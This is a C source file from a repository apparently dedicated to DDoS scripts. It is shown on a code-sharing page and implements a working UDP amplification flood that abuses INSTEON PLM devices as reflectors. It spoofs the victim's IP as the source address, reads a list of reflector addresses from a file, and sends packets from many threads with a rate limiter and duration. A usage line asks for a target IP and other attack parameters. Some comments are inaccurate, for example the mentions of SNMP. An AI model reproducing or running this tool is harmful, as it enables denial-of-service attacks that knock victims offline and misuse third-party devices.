Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/AMP Methods/INSTEON PLM Amplification/insteon.c
4622 views
1
/* 

2
private amplification

3
insteon plm devices.

4


5
Transmissional.

6
*/

7


8
#include <time.h>

9
#include <pthread.h>

10
#include <unistd.h>

11
#include <stdio.h>

12
#include <stdlib.h>

13
#include <string.h>

14
#include <sys/socket.h>

15
#include <netinet/ip.h>

16
#include <netinet/udp.h>

17
#include <arpa/inet.h>

18
#define MAX_PACKET_SIZE 8192

19
#define PHI 0x9e3779b9

20
static uint32_t Q[4096], c = 362436;

21
/*

22
let us define container sets.

23
we could use this to initialise more data response.

24
*/

25


26
#define get_response 0x002

27
#define meta_iso_req 0x00FFFF

28
#define mobset_rw_se 0x000000000

29
struct list

30
{

31
	struct sockaddr_in data;

32
	struct list *next;

33
	struct list *prev;

34
};

35
struct list *head;

36
volatile int tehport;

37
volatile int limiter;

38
volatile unsigned int pps;

39
volatile unsigned int sleeptime = 100;

40
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };

41
void init_rand(uint32_t x)

42
{

43
	int i; 

44
	Q[0] = x;

45
	Q[1] = x + PHI;

46
	Q[2] = x + PHI + PHI;

47
	for (i = 3; i < 4096; i++)

48
	{

49
	Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;

50
	}

51
}

52
uint32_t rand_cmwc(void)        

53
{

54
	uint64_t t, a = 18782LL;

55
	static uint32_t i = 4095;

56
	uint32_t x, r = 0xfffffffe;

57
	i = (i + 1) & 4095;

58
	t = a * Q[i] + c;

59
	c = (t >> 32);

60
	x = t + c;

61
	if (x < c) {

62
	x++;

63
	c++;

64
	}

65
	return (Q[i] = r - x);

66
}

67
unsigned short csum (unsigned short *buf, int nwords)

68
{

69
	unsigned long sum = 0;

70
	for (sum = 0; nwords > 0; nwords--)

71
	sum += *buf++;

72
	sum = (sum >> 16) + (sum & 0xffff);

73
	sum += (sum >> 16);

74
	return (unsigned short)(~sum);

75
}

76
void setup_ip_header(struct iphdr *iph)

77
{

78
	iph->ihl = 5;

79
	iph->version = 4;

80
	iph->tos = 0;

81
	iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 2; /* we set the payload length as an individual integer as sizeof() is NOT reliable */

82
	iph->id = htonl(54321);

83
	iph->frag_off = 0;

84
	iph->ttl = MAXTTL;

85
	iph->protocol = IPPROTO_UDP;

86
	iph->check = 0;

87
	iph->saddr = inet_addr("192.168.3.100"); /* jason this wasn't necessary yano */

88
}

89
	#define get_iso "\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06"

90
	#define net_iso "\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06"

91
void setup_udp_header(struct udphdr *udph) // setup our little cutie 

92
{

93
    /* we are establishing a full form connection to

94
       snmp. this should force release a get response

95
       which should include device data and traffic_D.

96
       response should be 1000+ 

97
    */

98
	udph->source = htons(5678);

99
	udph->dest = htons(9761);

100
	udph->check = 0;

101
	memcpy((void *)udph + sizeof(struct udphdr), "\x02\x60", 2);

102
	udph->len=htons(sizeof(struct udphdr) + 2);

103
}

104
void *flood(void *par1)

105
{

106
	struct thread_data *td = (struct thread_data *)par1;

107
	char datagram[MAX_PACKET_SIZE];

108
	struct iphdr *iph = (struct iphdr *)datagram;

109
	struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);

110
	struct sockaddr_in sin = td->sin;

111
	struct  list *list_node = td->list_node;

112
	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);

113
	if(s < 0){

114
	fprintf(stderr, "Could not open raw socket.\n"); // errors

115
	exit(-1);

116
	}

117
	init_rand(time(NULL));

118
	memset(datagram, 0, MAX_PACKET_SIZE);

119
	setup_ip_header(iph);

120
	setup_udp_header(udph);

121
	udph->source = htons(rand() % 65535 - 1026); // <-- you should try to play around with this 

122
	iph->saddr = sin.sin_addr.s_addr;

123
	iph->daddr = list_node->data.sin_addr.s_addr;

124
	iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

125
	int tmp = 1;

126
	const int *val = &tmp;

127
	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){

128
	fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n"); // errors 

129
	exit(-1);

130
	}

131
	init_rand(time(NULL));

132
	register unsigned int i;

133
	i = 0;

134
	while(1){

135
		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));

136
		list_node = list_node->next;

137
		iph->daddr = list_node->data.sin_addr.s_addr;

138
		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);

139
		iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

140
		

141
		pps++;

142
		if(i >= limiter)

143
		{

144
			i = 0;

145
			usleep(sleeptime);

146
		}

147
		i++;

148
	}

149
}

150
int main(int argc, char *argv[ ])

151
{

152
	if(argc < 6){

153
	fprintf(stderr, "Invalid parameters!\n");

154
	fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);

155
		exit(-1);

156
	}

157
	srand(time(NULL));

158
	int i = 0;

159
	head = NULL;

160
	fprintf(stdout, "Setting up sockets...\n");

161
	int max_len = 128;

162
	char *buffer = (char *) malloc(max_len);

163
	buffer = memset(buffer, 0x00, max_len);

164
	int num_threads = atoi(argv[4]);

165
	int maxpps = atoi(argv[5]);

166
	limiter = 0;

167
	pps = 0;

168
	int multiplier = 20;

169
	FILE *list_fd = fopen(argv[3],  "r");

170
	while (fgets(buffer, max_len, list_fd) != NULL) {

171
		if ((buffer[strlen(buffer) - 1] == '\n') ||

172
				(buffer[strlen(buffer) - 1] == '\r')) {

173
			buffer[strlen(buffer) - 1] = 0x00;

174
			if(head == NULL)

175
			{

176
				head = (struct list *)malloc(sizeof(struct list));

177
				bzero(&head->data, sizeof(head->data));

178
				head->data.sin_addr.s_addr=inet_addr(buffer);

179
				head->next = head;

180
				head->prev = head;

181
			} else {

182
				struct list *new_node = (struct list *)malloc(sizeof(struct list));

183
				memset(new_node, 0x00, sizeof(struct list));

184
				new_node->data.sin_addr.s_addr=inet_addr(buffer);

185
				new_node->prev = head;

186
				new_node->next = head->next;

187
				head->next = new_node;

188
			}

189
			i++;

190
		} else {

191
			continue;

192
		}

193
	}

194
	struct list *current = head->next;

195
	pthread_t thread[num_threads];

196
	struct sockaddr_in sin;

197
	sin.sin_family = AF_INET;

198
	sin.sin_addr.s_addr = inet_addr(argv[1]);

199
	struct thread_data td[num_threads];

200
	for(i = 0;i<num_threads;i++){

201
		td[i].thread_id = i;

202
		td[i].sin= sin;

203
		td[i].list_node = current;

204
		pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);

205
	}

206
	fprintf(stdout, "Starting flood...\n");

207
	for(i = 0;i<(atoi(argv[6])*multiplier);i++)

208
	{

209
		usleep((1000/multiplier)*1000);

210
		if((pps*multiplier) > maxpps)

211
		{

212
			if(1 > limiter)

213
			{

214
				sleeptime+=100;

215
			} else {

216
				limiter--;

217
			}

218
		} else {

219
			limiter++;

220
			if(sleeptime > 25)

221
			{

222
				sleeptime-=25;

223
			} else {

224
				sleeptime = 0;

225
			}

226
		}

227
		pps = 0;

228
	}

229
	return 0;

230
}

231


232